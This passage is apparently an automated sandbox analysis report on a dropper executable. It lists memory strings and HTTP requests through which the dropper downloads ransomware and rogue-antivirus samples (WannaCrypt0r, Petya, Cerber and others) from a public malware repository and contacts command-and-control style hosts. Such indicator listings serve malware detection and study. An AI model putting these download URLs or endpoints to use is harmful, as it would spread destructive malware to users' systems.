        Source: 1jDe7zWnoe.exe, 00000000.00000002.540747894.0000026280001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/SmartDefragmenter.zip
        Source: 1jDe7zWnoe.exe, 00000000.00000002.540747894.0000026280001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/VAV2008.zip
        Source: 1jDe7zWnoe.exe, 00000000.00000002.540747894.0000026280001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/Win7Recover.zip
        Source: 1jDe7zWnoe.exe, 00000000.00000002.540747894.0000026280001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/Windows%20Accelerator%20Pro.zip
        Source: 1jDe7zWnoe.exe, 00000000.00000002.540747894.0000026280001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/WolframAV.zip
        Source: 1jDe7zWnoe.exe, 00000000.00000002.540747894.0000026280001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/XFC.zip
        Source: 1jDe7zWnoe.exe, 00000000.00000002.540747894.0000026280001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/XP%20Antivirus%202008.zip
        Source: 1jDe7zWnoe.exe, 00000000.00000002.540747894.0000026280001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Endermanch/MalwareDatabase/raw/master/trojans/000.zip
        Source: 1jDe7zWnoe.exe, 00000000.00000002.540747894.0000026280001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Endermanch/MalwareDatabase/raw/master/trojans/000.zipM
        Source: 1jDe7zWnoe.exe, 00000000.00000002.540747894.0000026280001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Endermanch/MalwareDatabase/raw/master/trojans/ColorBug.zip
        Source: 1jDe7zWnoe.exe, 00000000.00000002.540747894.0000026280001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Endermanch/MalwareDatabase/raw/master/trojans/DesktopPuzzle.zip
        Source: 1jDe7zWnoe.exe, 00000000.00000002.540747894.0000026280001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Endermanch/MalwareDatabase/raw/master/trojans/FakeActivation.zip
        Source: 1jDe7zWnoe.exe, 00000000.00000002.540747894.0000026280001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Endermanch/MalwareDatabase/raw/master/trojans/HMBlocker.zip
        Source: 1jDe7zWnoe.exe, 00000000.00000002.540747894.0000026280001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Endermanch/MalwareDatabase/raw/master/trojans/Illerka.C.zip
        Source: 1jDe7zWnoe.exe, 00000000.00000002.540747894.0000026280001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Endermanch/MalwareDatabase/raw/master/trojans/MEMZ.zip
        Source: 1jDe7zWnoe.exe, 00000000.00000002.540747894.0000026280001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Endermanch/MalwareDatabase/raw/master/trojans/Spark.zip
        Source: 1jDe7zWnoe.exe, 00000000.00000002.540747894.0000026280001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Endermanch/MalwareDatabase/raw/master/trojans/TaskILL.zip
        Source: 1jDe7zWnoe.exe, 00000000.00000002.540747894.0000026280001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Endermanch/MalwareDatabase/raw/master/trojans/TaskILL.zipx
        Source: 1jDe7zWnoe.exe, 00000000.00000002.625113532.00000262805A9000.00000004.00000800.00020000.00000000.sdmp, 1jDe7zWnoe.exe, 00000000.00000002.624226400.000002628058A000.00000004.00000800.00020000.00000000.sdmp, 1jDe7zWnoe.exe, 00000000.00000002.645523187.0000026280714000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com8
        Source: 1jDe7zWnoe.exe, 00000000.00000002.560775948.0000026280061000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/BadRabbit.zip
        Source: 1jDe7zWnoe.exe, 00000000.00000002.579837323.000002628013F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Petya.A.zip
        Source: 1jDe7zWnoe.exe, 00000000.00000002.579837323.000002628013F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/PolyRansom.zip
        Source: 1jDe7zWnoe.exe, 00000000.00000002.579837323.000002628013F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/ViraLock.zip
        Source: 1jDe7zWnoe.exe, 00000000.00000002.579837323.000002628013F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/WannaCrypt0r.zip
        Source: 1jDe7zWnoe.exe, 00000000.00000002.579837323.000002628013F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Winlocker.VB6.Blacks
        Source: 1jDe7zWnoe.exe, 00000000.00000002.579837323.000002628013F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Xyeta.zip
        Source: 1jDe7zWnoe.exe, 00000000.00000002.624226400.000002628058A000.00000004.00000800.00020000.00000000.sdmp, 1jDe7zWnoe.exe, 00000000.00000002.579837323.000002628013F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/AnViPC2009.zip
        Source: 1jDe7zWnoe.exe, 00000000.00000002.579837323.000002628013F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/Antivirus%20Platinum.zip
        Source: 1jDe7zWnoe.exe, 00000000.00000002.579837323.000002628013F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/Antivirus%20Pro%202017.zi
        Source: 1jDe7zWnoe.exe, 00000000.00000002.579837323.000002628013F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/Antivirus.zip
        Source: 1jDe7zWnoe.exe, 00000000.00000002.625113532.00000262805A9000.00000004.00000800.00020000.00000000.sdmp, 1jDe7zWnoe.exe, 00000000.00000002.579837323.000002628013F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/FakeAdwCleaner.zip
        Source: 1jDe7zWnoe.exe, 00000000.00000002.645523187.0000026280714000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/Happy
        Source: 1jDe7zWnoe.exe, 00000000.00000002.645523187.0000026280714000.00000004.00000800.00020000.00000000.sdmp, 1jDe7zWnoe.exe, 00000000.00000002.579837323.000002628013F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/Happy%20Antivirus.zip
        Source: 1jDe7zWnoe.exe, 00000000.00000002.625113532.00000262805A9000.00000004.00000800.00020000.00000000.sdmp, 1jDe7zWnoe.exe, 00000000.00000002.624226400.000002628058A000.00000004.00000800.00020000.00000000.sdmp, 1jDe7zWnoe.exe, 00000000.00000002.560775948.0000026280061000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.comx
        Source: 1jDe7zWnoe.exe, 00000000.00000002.645523187.0000026280714000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.comxB
        Source: 1jDe7zWnoe.exe, 00000000.00000002.625113532.00000262805A9000.00000004.00000800.00020000.00000000.sdmp, 1jDe7zWnoe.exe, 00000000.00000002.624226400.000002628058A000.00000004.00000800.00020000.00000000.sdmp, 1jDe7zWnoe.exe, 00000000.00000002.645523187.0000026280714000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://render.githubusercontent.com
        Source: svchost.exe, 00000005.00000002.310651024.000001E5E5A3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
        Source: svchost.exe, 00000005.00000002.310298217.000001E5E5A13000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.310651024.000001E5E5A3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
        Source: svchost.exe, 00000005.00000003.309472318.000001E5E5A40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
        Source: svchost.exe, 00000005.00000003.309742720.000001E5E5A56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
        Source: svchost.exe, 00000005.00000003.309472318.000001E5E5A40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
        Source: svchost.exe, 00000005.00000002.310644235.000001E5E5A3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.287334816.000001E5E5A32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
        Source: svchost.exe, 00000005.00000003.309107047.000001E5E5A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.310693087.000001E5E5A4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
        Source: Endermanch@Cerber5.exe, 0000000D.00000003.341552127.0000000005125000.00000004.00000800.00020000.00000000.sdmp, Endermanch@Cerber5.exe, 0000000D.00000002.369995185.0000000005136000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.baidu.com
        Source: Endermanch@Cerber5.exe, 0000000D.00000003.341552127.0000000005125000.00000004.00000800.00020000.00000000.sdmp, Endermanch@Cerber5.exe, 0000000D.00000002.369995185.0000000005136000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.baidu.com/s?wd=%E6%80%8E%E4%B9%88%E5%AE%89%E8%A3%85%20tor%20%E6%B5%8F%E8%A7%88%E5%99%A8
        Source: Endermanch@DeriaLock.exe, 00000013.00000002.612271253.000000000261D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bplaced.net/
        Source: Endermanch@DeriaLock.exe, 00000013.00000002.612271253.000000000261D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bplaced.net/apple-touch-icon.png
        Source: Endermanch@DeriaLock.exe, 00000013.00000002.612271253.000000000261D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bplaced.net/contact
        Source: Endermanch@DeriaLock.exe, 00000013.00000002.612271253.000000000261D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bplaced.net/css/error.css
        Source: Endermanch@DeriaLock.exe, 00000013.00000002.612271253.000000000261D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bplaced.net/datenschutz
        Source: Endermanch@DeriaLock.exe, 00000013.00000002.612271253.000000000261D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bplaced.net/favicon-16x16.png
        Source: Endermanch@DeriaLock.exe, 00000013.00000002.612271253.000000000261D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bplaced.net/favicon-32x32.png
        Source: Endermanch@DeriaLock.exe, 00000013.00000002.612271253.000000000261D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bplaced.net/favicon.ico
        Source: Endermanch@DeriaLock.exe, 00000013.00000002.612271253.000000000261D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bplaced.net/gfx/emblem_b_xs.png
        Source: Endermanch@DeriaLock.exe, 00000013.00000002.612271253.000000000261D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bplaced.net/impressum
        Source: Endermanch@DeriaLock.exe, 00000013.00000002.612271253.000000000261D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bplaced.net/privacy
        Source: Endermanch@DeriaLock.exe, 00000013.00000002.612271253.000000000261D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bplaced.net/safari-pinned-tab.svg
        Source: 1jDe7zWnoe.exe, 00000000.00000002.642311914.00000262806A0000.00000004.00000800.00020000.00000000.sdmp, Endermanch@FakeAdwCleaner.exe.0.drString found in binary or memory: https://www.digicert.com/CPS0
        Source: Error file remover.msi.57.dr, Endermanch@WinlockerVB6Blacksod.exe.0.drString found in binary or memory: https://www.thawte.com/cps0/
        Source: Error file remover.msi.57.dr, Endermanch@WinlockerVB6Blacksod.exe.0.drString found in binary or memory: https://www.thawte.com/repository0
        Source: Endermanch@Cerber5.exe, 0000000D.00000003.341996956.000000000511A000.00000004.00000800.00020000.00000000.sdmp, Endermanch@NoMoreRansom.exe, 00000027.00000002.526568195.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Endermanch@Petya.A.exe, 0000002F.00000002.558809310.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, DR011.47.drString found in binary or memory: https://www.torproject.org/
        Source: Endermanch@Cerber5.exe, 0000000D.00000003.341552127.0000000005125000.00000004.00000800.00020000.00000000.sdmp, Endermanch@Cerber5.exe, 0000000D.00000002.369995185.0000000005136000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.torproject.org/downlo&#097;d/download-easy.html.en
        Source: Endermanch@Cerber5.exe, 0000000D.00000002.369995185.0000000005136000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.torproject.org/download/download-easy.html.en
        Source: Endermanch@Cerber5.exe, 0000000D.00000002.369995185.0000000005136000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
        Source: Endermanch@Cerber5.exe, 0000000D.00000002.369995185.0000000005136000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/results?search_query=Install
        Source: unknownDNS traffic detected: queries for: github.com
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_04772054 GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetProcessHeap,HeapAlloc,htons,send,recv,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,12_2_04772054
        Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/BadRabbit.zip HTTP/1.1Host: github.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/BadRabbit.zip HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Birele.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Birele.zip HTTP/1.1Host: raw.githubusercontent.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Cerber%205.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Cerber%205.zip HTTP/1.1Host: raw.githubusercontent.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/DeriaLock.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/DeriaLock.zip HTTP/1.1Host: raw.githubusercontent.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Fantom.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Fantom.zip HTTP/1.1Host: raw.githubusercontent.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/InfinityCrypt.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/InfinityCrypt.zip HTTP/1.1Host: raw.githubusercontent.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Krotten.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Krotten.zip HTTP/1.1Host: raw.githubusercontent.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/NoMoreRansom.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/NoMoreRansom.zip HTTP/1.1Host: raw.githubusercontent.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Petya.A.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Petya.A.zip HTTP/1.1Host: raw.githubusercontent.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/PolyRansom.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/PolyRansom.zip HTTP/1.1Host: raw.githubusercontent.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Winlocker.VB6.Blacksod.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Winlocker.VB6.Blacksod.zip HTTP/1.1Host: raw.githubusercontent.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/ViraLock.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/ViraLock.zip HTTP/1.1Host: raw.githubusercontent.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/WannaCrypt0r.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/WannaCrypt0r.zip HTTP/1.1Host: raw.githubusercontent.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Xyeta.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/ransomwares/Xyeta.zip HTTP/1.1Host: raw.githubusercontent.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Antivirus.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/Antivirus.zip HTTP/1.1Host: raw.githubusercontent.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Antivirus%20Platinum.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/Antivirus%20Platinum.zip HTTP/1.1Host: raw.githubusercontent.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Antivirus%20Pro%202017.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/Antivirus%20Pro%202017.zip HTTP/1.1Host: raw.githubusercontent.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/AnViPC2009.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/AnViPC2009.zip HTTP/1.1Host: raw.githubusercontent.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/FakeAdwCleaner.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/FakeAdwCleaner.zip HTTP/1.1Host: raw.githubusercontent.com
        Source: global trafficHTTP traffic detected: GET /1001 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: yandex.ruCookie: _yasc=ci6rbjmrlQgO0axLw7w6OWn+wuU8RFP050vqcbO+koLLPW4r; is_gdpr_b=CPe0cBDfjAEYAQ==; is_gdpr=1
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/raw/master/rogues/Happy%20Antivirus.zip HTTP/1.1Host: github.com
        Source: global trafficHTTP traffic detected: GET /Endermanch/MalwareDatabase/master/rogues/Happy%20Antivirus.zip HTTP/1.1Host: raw.githubusercontent.com
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/UNLOCKKEYS/LOGON.exe HTTP/1.1Host: arizonacode.bplaced.netConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /themes/prestashop/cache/stats.php HTTP/1.1Host: powertoolsforyou.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /themes/prestashop/cache/stats.php HTTP/1.1Host: powertoolsforyou.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
        Source: global trafficHTTP traffic detected: GET /d2ea090d-962c-45e9-bd4f-67977169ed52 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
        Source: global trafficHTTP traffic detected: GET /1001 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: yandex.ru
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
        Source: global trafficHTTP traffic detected: GET /scripts/new_install.php?owner=6AdwCleaner HTTP/1.1Host: www.vikingwebscanner.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: google.com
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.netConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
        Source: global trafficHTTP traffic detected: GET /HF/SystemLocker/unlock-everybody.txt HTTP/1.1Host: arizonacode.bplaced.net
